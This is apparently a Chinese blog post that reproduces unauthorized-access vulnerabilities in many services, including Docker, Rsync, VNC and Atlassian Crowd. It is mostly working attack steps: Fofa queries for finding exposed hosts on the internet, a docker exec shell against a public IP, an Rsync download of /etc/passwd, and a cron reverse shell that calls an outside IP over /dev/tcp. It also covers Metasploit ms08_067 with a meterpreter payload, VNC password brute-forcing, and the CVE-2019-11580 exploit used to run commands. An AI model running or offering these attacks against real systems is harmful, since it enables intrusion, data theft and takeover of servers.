未授权访问漏洞下（漏洞复现合集）

ElasticSearch是一个基于Lucene的搜索服务器。它提供了一个分布式多用户能力的全文搜索引擎，基于RESTful web接口。Elasticsearch是用Java开发的，并作为Apache许可条款下的开放源码发布，是当前流行的企业级搜索引擎。Elasticsearch的增删改查操作全部由http接口完成。由于Elasticsearch授权模块需要付费，所以免费开源的Elasticsearch可能存在未授权访问漏洞。该漏洞导攻击者可以拥有Elasticsearch的所有权限。可以对数据进行任意操作。业务系统将面临敏感数据泄露、数据丢失、数据遭到破坏甚至遭到攻击者的勒索

步骤一:使用以下Fofa语法进行Elasticsearch产品搜索..

"Elasticsearch" && port="9200"

步骤二:存在未授权访问则直接进入到信息页面...不需要输入用户密码登陆...

#访问测试

http://localhost:9200/_plugin/head/ web管理界面

http://localhost:9200/_cat/indices

http://localhost:9200/_river/_search 查看数据库敏感信息

http://localhost:9200/_nodes 查看节点数据

步骤三:可按照上面查看节点信息等...

http:// localhost:9200/_nodes

八:Kibana未授权访问漏洞

Kibana是一个开源的分析与可视化平台，设计出来用于和Elasticsearch一起使用的。你可以用kibana搜索、查看存放在Elasticsearch中的数据。Kibana与Elasticsearch的交互方式是以各种不同的图表、表格、地图等直观地展示数据，从而达到高级的数据分析与可视化的目的。

Elasticsearch、Logstash和Kibana这三个技术就是我们常说的ELK技术栈，可以说这三个技术的组合是大数据领域中一个很巧妙的设计。一种很典型的MVC思想，模型持久层，视图层和控制层。Logstash担任控制层的角色，负责搜集和过滤数据。Elasticsearch担任数据持久层的角色，负责储存数据。而我们这章的主题Kibana担任视图层角色，拥有各种维度的查询和分析并使用图形化的界面展示存放在Elasticsearch中的数据。

步骤一:使用以下Fofa语句搜索Kibana产品.并打开页面..

"kibana" && port="5601"

步骤二:直接访问Kibana的页面且无需账号密码可以登陆进入界面…

九:Docker Remote API未授权访问漏洞

Docker是一个开源的应用容器引擎，让开发者可以打包他们的应用以及依赖包到一个可移植的容器中，然后发布到任何流行的LINUX机器上，也可以实现虚拟化。

Docker swarm 是一个将docker集群变成单一虚拟的docker host工具，使用标准的Docker API，能够方便docker集群的管理和扩展，由docker官方提供。

步骤一:使用以下Fofa语句对Docker产品进行搜索.

port="2375"

步骤二:直接使用浏览器访问以下路径...

http://ip:2375/version #查看版本信息

http://ip:2375/info #查看容器信息

步骤三:使用-H参数连接目标主机的docker，使用ps命令查询目标系统运行的镜像

docker -H tcp://51.77.151.198:2375 ps

docker -H tcp://51.77.151.198:2375 version

docker -H tcp://51.77.151.198:2375 exec it 1f4 /bin/bash

十:Kubernetes Api Server未授权访问漏洞

Kubernetes 的服务在正常启动后会开启两个端口:Localhost Port (默认8080)Secure Port(默认6443)。这两个端口都是提供 Api Server 服务的，一个可以直接通过Web 访问，另一个可以通过 kubectl 客户端进行调用。如果运维人员没有合理的配置验证和权限，那么攻击者就可以通过这两个接口去获取容器的权限。

步骤一:使用以下Fofa语法搜索Kubernetes产品..

port="8080"" && app="Kubernetes"

步骤二:在打开的网页中直接访问 8080 端口会返回可用的 API列表...

十一:Hadoop未授权访问漏洞

Hadoop是一个由Apache基金会所开发的分布式系统基础架构，由于服务器直接在开放了Hadoop 机器 HDFS 的 50070 web 端口及部分默认服务端口，黑客可以通过命令行操作多个目录下的数据，如进行删除，下载，目录浏览甚至命令执行等操作，产生极大的危害。

步骤一:使用以下FOFA语法进行Hadoop产品的搜索...

port="8088" && app="Hadoop"

步骤二:开启页面直接访问不经过用户密码验证...

十二:ActiveMQ未授权访问漏洞

ActiveMQ是一款流行的开源消息服务器。默认情况下，ActiveMQ服务是没有配置安全参恶意人员可以利用默认配置弱点发动远程命令执行攻击，获取服务器权限，从而导致数据泄数。

步骤一:使用以下Fofa语法搜索产品...

body="ActiveMQ" && port="8161"

步骤二:ActiveMQ默认使用8161端口，默认用户名和密码是 admin/admin ，在打开的页面输入...

十三:RabbitMQ未授权访问漏洞

RabbitMQ是目前非常热门的一款消息中间件，基于AMQP协议的，可以在发布者和使用者之间交换异步消息。消息可以是人类可读的JSON，简单字符串或可以转换为JSON字符串的值列表

步骤一:使用以下Fofa语法对RabbitMQ产品进行搜索..

port="15672"

步骤二:在打开的页面中可输入默认的账号和密码进行登陆

#默认账号密码都是guest

十四:Springboot Actuator未授权访问漏洞

Actuator 是 springboot 提供的用来对应用系统进行自省和监控的功能模块，借助于 Actuator 开发者可以很方便地对应用系统某些监控指标进行查看、统计等。在 Actuator 启用的情况下，如果没有做好相关权限控制，非法用户可通过访问默认的执行器端点(endpoints)来获取应用系统中的监控信息，从而导致信息泄露甚至服务器被接管的事件发生。

步骤一:使用以下Fofa语句搜索资产并打开页面访问.

#Fofa语法

icon hash="116323821” && country="US"

步骤二:当 web 应用程序出现 4xx、5xx 错误时显示类似以下页面就能确定当前 web 应用是使用了springboot 框架..

步骤三:拼接以下路径查看泄露的数据.

访问/trace端点获取基本的 HTTP 请求跟踪信息(时间戳、HTTP 头等)，如果存在登录用户的操作请求，可以伪造cookie进行登录。

访问/env端点获取全部环境属性，由于actuator 会监控站点 mysql、mangodb 之类的数据库服务，所以通过监控信息有时可以mysql、mangodb 数据库信息，如果数据库正好开放在公网，那么造成的危害是巨大的。

git 项目地址泄露，这个一般是在/health 路径，比如如下站点，访问其 health 路径可探测到站点 git 项目地址。

十五:FTP未授权访问漏洞(匿名登陆)

FTP 弱口令或匿名登录漏洞，一般指使用 FTP 的用户启用了匿名登录功能，或系统口令的长度太短、复杂度不够、仅包含数字、或仅包含字母等，容易被黑客攻击，发生恶意文件上传或更严重的入侵行为。

步骤一:对目标环境在资源管理器中用以下格式访问...如果该服务器开启了匿名登陆，则可直接进行内容查看..

ftp://ip:port/

十六:JBoss未授权访问漏洞 *

JBoss是一个基于J2EE的开放源代码应用服务器，代码遵循LGPL许可，可以在任何商业应用中免费使用;JBoss也是一个管理EJB的容器和服务器，支持EJB1.1、EJB 2.0和EJB3规范。,默认情况下访问 http://ip:8080/imx-console 就可以浏览 JBoss 的部署管理的信息不需要输入用户名和密码可以直接部署上传木马有安全隐患。

步骤一:使用以下语法搜索Jboss产品并打开其页面.

title="Welcome to JBoss"

步骤二:拼接以下路径且无需认证直接进入控制页面.

#拼接路径

http://ip:port/jmx-console/

十七:Ldap未授权访问漏洞

LDAP中文全称为:轻型目录访问协议(LightweightDirectoryAccess Protocol)，默认使用389， LDAP 底层一般使用 TCP 或 UDP 作为传输协议。目录服务是一个特殊的数据库，是一种以树状结构的目录数据库为基础。未对LDAP的访问进行密码验证，导致未授权访问。

步骤一:使用以下Fofa语法搜索使用Idap服务的产品.….并通过Ldapadmin可视化工具做连接验证...

#Fofa语法

port="389"

#Ldapadmin工具

https://sourceforge.net/projects/ldapadmin/

步骤二:启动工具并测试存在未授权的LDAP服务..成功如下...

步骤三:连接目标LDAP服务并查看其内容

十八:Rsync未授权访问漏洞 *

Rsync 是Linux/Unix下的一个远程数据同步工具，可通过LAN/WAN快速同步多台主机间的文件和目录，默认运行在873端口。由于配置不当，导致任何人可未授权访问rsync，上传本地文件，下载服务器文件。Rsync 默认允许匿名访问，如果在配置文件中没有相关的用户认证以及文件授权就会触发隐患。Rsync 的默认端口为837且默认配置文件路径在/etc/rsync.conf

步骤一:在 fofa 中搜索该资产语法如下并在Vulhub中开启靶场!!!

# Fofa语法

(port="873") && (is_honeypot=false && is_fraud=false)

# 启动靶场

cd vulhub/rsync/common

docker-compose up -d

步骤二:可使用Nmap扫描该端口是否开启服务，还可以使用Metasploit中关于允许匿名访问的rsync扫描模块进行探测...

# nmap命令

nmap -p 873 --script rsync-list-modules ipaddress

# Metasploit模块

auxiliary/scanner/rsync/modules_list

步骤三:使用命令进行链接并读取文件...

#执行命令

rsync rsync://192.168.124.153:873/

rsync rsync://192.168.124.153:873/src/

#执行效果

步骤四:对系统中的敏感文件下载操作.../etc/passwd

# 执行命令

命令格式:rsync rsync://IP:port/src/etc/passwd目标路径

例如:

rsync rsync://192.168.124.153:873/src/etc/passwd ~/Desktop

#结果查看

步骤五:上传文件..如果有相应的jsp/asp/php环境可以写一句话以phpinfo为例...

#攻击机操作

root@kali:/#

echo "" > phpinfo.php

root@kali:/#

cat ./phpinfo.php

root@kali:/#

rsync ./phpinfo.php rsync://192.168.124.153:873/src/home/

# 靶机操作

cd home

步骤六:反弹shel...在此可利用定时任务cron来反弹获取shell

# 1.查看定时任务

root@kali:/#

rsync rsync://192.168.124.153:873/src/etc/crontab

#2.将定时任务文件下载下来

rsync rsync://192.168.124.153/src/etc/crontab ~/Desktop/crontab.txt

3.定时任务内容为，大致意思为每17分钟调用一次/etc/cron.hourly

4.创建shell文件

#!/bin/bash

/bin/bash -i >& /dev/tcp/60.205.170.32/7747 0>&1

5.授权shell文件

chmod 777 shell

6.上传shell至靶机

root@kali:/#

rsync -av ./shell rsync://192.168.124.153:873/src/etc/cron.hourly

7.攻击机开启nc监听相应端口

nc -lvp 7747

十九:VNC未授权访问漏洞

VNC 是虚拟网络控制台 Virtual NetworkConsole 的英文缩写。它是一款优秀的远程控制工具软件由美国电话电报公司AT&T的欧洲研究实验室开发。VNC是基于 UNXI和 Linux 的免费开源软件由 VNC Server 和 VNC Viewer 两部分组成。VNC 默认端口号为 5900、5901。VNC 未授权访问漏洞如被利用可能造成恶意用户直接控制target主机。

步骤一:使用以下语句在Fofa上进行资产收集...

(port="5900")&&(is_honeypot=false && is_fraud=false)

步骤二:可通过MSF中的模块进行检测与漏洞利用.

# VNC未授权检测

msf6 >use auxiliary/scanner/vnc/vnc none auth

msf6 auxiliary(scanner/vnc/vnc_none_auth) > show options

msf6 auxiliary(scanner/vnc/vnc_none_auth) > set rhosts 192.168.168.200-254

msf6 auxiliary(scanner/vnc/vnc_none_auth) > set threads 100

msf6 auxiliary(scanner/vnc/vnc_none_auth) > run

# VNC密码爆破

msf6 >use auxiliary/scanner/vnc/vnc_login

msf6 auxiliary(scanner/vnc/vnc_login) > 192.168.207.132

msf6 auxiliary(scanner/vnc/vnc_login) > set rhosts 192.168.207.132

msf6 auxiliary(scanner/vnc/vnc_login) >   //弱密码爆破

msf6 auxiliary(scanner/vnc/vnc_login) > run

# 加载攻击模块

msf6 exploit(windows/smb/ms08_067_netapi) > use exploit/windows/smb/ms08_067_netapi

msf6 exploit(windows/smb/ms08_067_netapi) > set payload windows/meterpreter/reverse tcp

msf6 exploit(windows/smb/ms08_067_netapi) > set rhosts 192.168.168.228

msf6 exploit(windows/smb/ms08_067_netapi) > set lhost 192.168.168.102

msf6 exploit(windows/smb/ms08_067_netapi) > set target 34

msf6 exploit(windows/smb/ms08_067_netapi) > exploit

获取会话后，直接run vnc可控制远程虚拟机

# 直接控制远程机器

msf6>use exploit/multi/handler

msf6 exploit(multi/handler) > set payload windows/vncinject/reverse_tcp

msf6 exploit(multi/handler) > set lhost 192.168.168.102

msf6 exploit(multi/handler) > set lport 4466

msf6 exploit(multi/handler) > exploit

步骤三:VNC链接验证...

vncviewer ipaddress

二十:Dubbo未授权访问漏洞

Dubbo是阿里巴巴公司开源的一个高性能优秀的服务框架，使得应用可通过高性能的 RPC实现服务的输出和输入功能，可以和 Spring框架无缝集成。dubbo 因配置不当导致未授权访问漏洞。

步骤一:使用以下语句在Fofa上进行资产收集...

(app="APACHE-dubbo") && (is_honeypot=false && is_fraud=false)

步骤二:使用TeInet程序直接进行链接测试...

telnet IP port

二十一:NSF共享目录未授权访问

Network File System(NFS)，是由SUN公司研制的UNIX表示层协议(pressentation layerprotocol).能使使用者访问网络上别处的文件就像在使用自己的计算机一样。服务器在启用nfs服务以后，由于nfs服务未限制对外访问，导致共享目录泄漏。

步骤一:使用以下语句在Fofa上进行资产收集...

"nfs"

步骤二:执行命令进行漏洞复现…

#安装nfs客户端

apt install nfs-common

#查看nfs服务器上的共享目录

showount -e 192.168.207.129

#挂载相应共享目录到本地

mount -t nfs 192.168.207.129:/grdata /mnt

#卸载目录

umount /mnt

二十二:Druid未授权访问漏洞

当开发者配置不当时就可能造成未授权访问下面给出常见Druid未授权访问路径漏洞特征:http://www.xxxx.com/druid/index.html

/druid/websession.html

/system/druid/websession.html

/webpage/system/druid/websession.html(jeecg)

步骤一:使用以下语句在Fofa与Google上进行资产收集...

# Fofa

title="Druid Stat Index"

#PHPINFO页面

inurl:phpinfo.php intitle:phpinfo()

info.php test.php

# Druid未授权访问

inurl:"druid/index.html" intitle:"Druid Stat Index"

步骤二:对访问到的站点查看...

步骤三:Druid批量扫描脚本...

https://github.com/MzzdToT/CVE-2021-34045

二十三:Altassian Crowd未授权访问漏洞

Atlassian Crowd和Atlassian Crowd Data Center都是澳大利亚Atlassian公司的产品。Atlassian Crowd是一套基于Web的单点登录系统。该系统为多用户、网络应用程序和目录服务器提供验证、授权等功能。Atlassian Crowd Data Center是Crowd的集群部署版。AtlassianCrowd和Crowd Data Center在其某些发行版本中错误地启用了pdkinstall开发插件，使其存在安全漏洞。攻击者利用该漏洞可在未授权访问的情况下对Atlassian Crowd和Crowd DataCenter安装任意的恶意插件，执行任意代码/命令，从而获得服务器权限。其端口:8095

步骤一:准备一台Ubuntu虚拟机并执行以下命令下载搭建 Atlassian-crowd-3.4.3 ...

#下载crowd3.4.3的版本，进行测试。

wget https://product-downloads.atlassian.com/software/crowd/downloads/atlassian-crowd-3.4.3.zip

步骤二:搭建Java环境并查看JDK版本...

#搭建Java环境

sudo apt-get install openjdk-8-jdk

#查看JDK版本

Java -vesion

步骤三:解压缩文件并移动到指定位置...

解压缩文件#

unzip atlassian-crowd-3.4.3.zip

# 移动文件atlassian-crowd-3.4.3到/var目录下

sudo cp -r atlassian-crowd-3.4.3 /var/

#到该目录下

cd /var/atlassian-crowd-3.4.3/crowd-webapp/WEB-INF/classes/

步骤四:修改配置文件并添加信息...

# 配置文件

sudo vi crowd-init.properties

# 添加信息

crowd.home=/var/atlassian-crowd-3.4.3

# 开启服务

sudo sh start_crowd.sh

#访问页面http://192.168.207.129:8095/

步骤五:点击Set up Crowd需要申请key，复制Server ID;进入以下官网并点击New TrialLicense申请key...

#官网

https://product-downloads.atlassian.com/software/crowd/downloads/atlassian-crowd-3.4.3.zip

步骤六:进去后，填写信息和上方复制的ServerID，会生成一个key，复制key...

步骤七:将上方的key，粘贴到下方license key中..点击continue进入如下页面，选择Embedded，点击continue...

步骤八:进入配置信息，无需修改，点击continue点击continue，其中配置登录账号密码...点击 continue ，跳转到登录页面，输入刚才配置的账户密码码...登录即可!

步骤一:下载攻击脚本到本地...

git clone https://github.com/jas502n/CVE-2019-11580

cd CVE-2019-11580/

步骤二:执行攻击命令并验证...

python2 CVE-2019-11580.py http://192.168.207.129:8095/

访问

http://192.168.127.129:8095/crowd/plugins/servlet/exp?cmd=cat /etc/passwd

Meet.meet

关注

47
点赞
踩
26

收藏

觉得还不错? 一键收藏
0
评论
未授权访问漏洞下（漏洞复现合集）

Hadoop是一个由Apache基金会所开发的分布式系统基础架构，由于服务器直接在开放了Hadoop 机器 HDFS 的 50070 web 端口及部分默认服务端口，黑客可以通过命令行操作多个目录下的数据，如进行删除，下载，目录浏览甚至命令执行等操作，产生极大的危害。访问/env端点获取全部环境属性，由于actuator 会监控站点 mysql、mangodb 之类的数据库服务，所以通过监控信息有时可以mysql、mangodb 数据库信息，如果数据库正好开放在公网，那么造成的危害是巨大的。
复制链接

扫一扫